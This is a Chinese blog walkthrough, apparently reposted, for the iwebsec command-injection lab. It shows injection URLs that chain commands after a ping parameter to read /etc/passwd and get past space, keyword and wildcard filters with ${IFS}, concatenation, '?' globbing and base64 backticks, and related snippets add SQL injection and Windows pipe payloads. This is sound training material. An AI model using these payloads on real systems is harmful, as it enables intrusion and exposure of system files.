iwebsec靶场-命令执行漏洞

最新推荐文章于 2024-05-10 11:20:46 发布
最新推荐文章于 2024-05-10 11:20:46 发布
阅读量817 收藏 3
点赞数
文章标签: 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dahege666/article/details/129881368
版权

漏洞简介

        命令执行漏洞(Command Injection)是一种常见的安全漏洞,也被称为代码注入漏洞。它允许攻击者将恶意代码注入到受攻击的应用程序中,从而可以在应用程序的上下文中执行任意命令。

        命令执行漏洞通常出现在Web应用程序中,特别是在接受用户输入的Web表单和参数的地方。攻击者可以利用这些输入来构造恶意的命令,然后将其注入到应用程序中。如果应用程序未正确验证和过滤输入,恶意命令就可以被执行,导致应用程序的数据泄露、损坏或完全被接管。

        例如,一个Web应用程序可能允许用户输入搜索查询,而这些查询参数被传递给一个后端操作系统的shell命令执行。如果攻击者可以将恶意代码注入到搜索查询中,那么他们就可以执行任意命令,例如下载敏感数据或在服务器上执行恶意软件。

        为了避免命令执行漏洞,应用程序应该始终验证和过滤输入,确保它们只包含所需的字符和格式,并使用参数化查询或其他安全的查询方法来避免使用拼接字符串的方式构造查询。

01、命令执行漏洞

选择第一个命令执行漏洞连接

源码分析

通过docker ps命令查看容器id,docker exec进入到容器的命令行界面

使用cat命令查看源码

        分析源码内容,参数ip执行ping操作,没有做任何过滤操作,导致命令执行漏洞,在ip地址后加入命令连接符即可执行其他命令。

命令执行

在URL后缀添加ip=127.0.0.1

然后再ip=127.0.01 后面添加  ; 分号作为分隔符,写入并执行其他命令,如whoami,cat /etc/passwd,如图所示,即可成功执行其他系统命令。

02、命令执行漏洞空格绕过

源码分析

查看源码可看出对IP参数过滤了空格

再次执行ip=127.0.0.1;cat /etc/passwd会报错

(1)可以用%09制表符URL编码代替空格,绕过空格过滤

http://192.168.102.131:8001/exec/02.php?ip=127.0.0.1;cat%09/etc/passwd

(2)< 小于号绕过

http://192.168.102.131:8001/exec/02.php?ip=127.0.0.1;cat%3C/etc/passwd

(3){,} 中括号过滤

http://192.168.102.131:8001/exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}

(4)${IFS}绕过

http://192.168.102.131:8001/exec/02.php?ip=127.0.0.1;cat${IFS}/etc/passwd

(5)$IFS$9

http://192.168.102.131:8001/exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

03、命令执行漏洞关键命令绕过

源码分析

如下图所示,源码过滤了cat命令

绕过方法

(1)拼接绕过

使用a=ca;b=t;$a$b /etc/passwd绕过

http://192.168.102.131:8001/exec/03.php?ip=127.0.0.1;a=ca;b=t;$a$b%20/etc/passwd

(2)命令替换绕过

more:一页一页的显示档案内容

less:与 more 类似

head:查看头几行

tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

tail:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看

file -f:报错出具体内容

sh /etc/passwd 2>%261 //报错出文件内容

http://192.168.102.131:8001/exec/03.php?ip=127.0.0.1;more%20/etc/passwd

04、命令执行漏洞通配符绕过

源码分析

如下图所示,过滤了关键字etc|passwd

使用通配符方法进行绕过渗透,​?字符代表单个字符,可以分别将etc和passwd其中的1个或者是多个字符分别用?替换。?不能匹配空字符。

(1)http://192.168.102.131:8001/exec/04.php?ip=127.0.0.1;cat%20/et?/pass??

(2)http://192.168.102.131:8001/exec/04.php?ip=127.0.0.1;cat%20/?tc/pa??wd

05、命令执行漏洞base64编码绕过

源码分析

如下图所示,源码中过滤了id命令

(1)首先可以使用base64编码工具对id编码直接写在url后面

http://192.168.102.131:8001/exec/05.php?ip=127.0.0.1;aWQK

(2)使用linux中命令进行编码

echo id|base64

反引号括起来的值会被当做命令执行

http://192.168.102.131:8001/exec/05.php?ip=127.0.0.1;`echo%20aWQK|bsae64%20-d`

原文章:https://blog.csdn.net/mooyuan/article/details/128027631

我是哥哥。
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iwebsec靶场命令执行漏洞(全部)
qq_56041380的博客
04-09 407
应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。它属于高危漏洞之一。
iwebsec(代码执行
果粒程
03-04 536
iwebsec(代码执行
DVWA靶场-命令注入漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-10 635
超详细的dvwa靶场Command injection命令注入漏洞低、中、高等级的全面讲解,小白入!!!
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2800
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
iwebsec--命令执行漏洞
追求卓越,技术流~
12-04 835
WINDOWS系统支持的管道符 “|”:直接执行后面的语句 例如:ping www.baidu.com|whoami “||”:如果前面执行的语句执行出错,则执行后面的语句 例如:png www.baidu.com||whoami “&”:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 例如:png www.baidu.com&whoami或者ping www.baidu.com&whoami “&&”:如果前面的语句为真先执行第一个命令执行第二个命令;为假则直接出错,也不执行后面的语句 例如
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的博客
04-20 1612
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
log4j漏洞靶场docker-compose.zip
01-14
其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
xsser.7z漏洞练习靶场
01-03
**XSSer 7z 漏洞练习靶场** XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的交互行为或者窃取敏感信息。这个"Xsser.7z漏洞练习靶场...
常见的Web漏洞——命令注入
热门推荐
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
命令执行漏洞--ibos靶场靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1049
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
CTF学习笔记9:iwebsec-SQL注入漏洞-07-空格过滤绕过
lifeng_dc的博客
01-23 1406
一、直接上payload ?id=-1%0aunion%a0select%0a1,2,group_concat(concat(username,0x7e,password))/**/from(iwebsec.users) 二、以上用到了多种绕过空格的方法 %a0 %0a /**/ ()
网络安全——命令执行漏洞概述
weixin_54055099的博客
09-17 2580
命令执行漏洞的概述,管道符号在LINUX和Windows的用户
iwebsec--代码执行漏洞
追求卓越,技术流~
12-04 1138
代码审计 如果post请求中有1,就会执行1中的参数 assert()函数和evel()函数类似,能把里面的字符串转化为php代码执行 call_user_func()函数第一个参数是函数,第二个参数是调用的参数 fun=“系统执行的函数”,而arg=“系统执行命令” 可以说,如果黑客知道有这个函数那么后果是非常严重的,可以写入任意的语句 和call_user_func一样没太大区别 create_function()函数,func构造的函数,而func构造的函数,而func构造的函数,而code
DVWA关卡2:Command Injection(命令注入漏洞)
m0_54899775的博客
12-06 1053
DVWA关卡2:Command Injection(命令注入漏洞)
web安全之命令执行(六)
Delity的博客
07-08 3653
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。可以使用以下命令来启动靶场并将宿主机的8001端口映射给iwebsec靶场的80服务: docker run --restart=always --name iwebsec -it -dp 8001:80 iwebsec/iwebsec \[2\] 这样每次启动靶场时,都会自动运行,并且宿主机的8001端口会映射给靶场的80服务。 需要注意的是,iwebsec靶场还包含一些漏洞渗透,如redis数据库漏洞和MySQL数据库漏洞。如果需要进行渗透测试,需要将iwebsec靶场中的redis服务端口号和MySQL服务端口号映射到主机端口中。可以使用以下命令来查找iwebsec的配置文件: find / -name iwebsec_info.md \[3\] #### 引用[.reference_title] - *1* [Web安全 iwebsec 靶场搭建.](https://blog.csdn.net/weixin_54977781/article/details/130341391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [iwebsec靶场搭建](https://blog.csdn.net/mooyuan/article/details/128031434)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值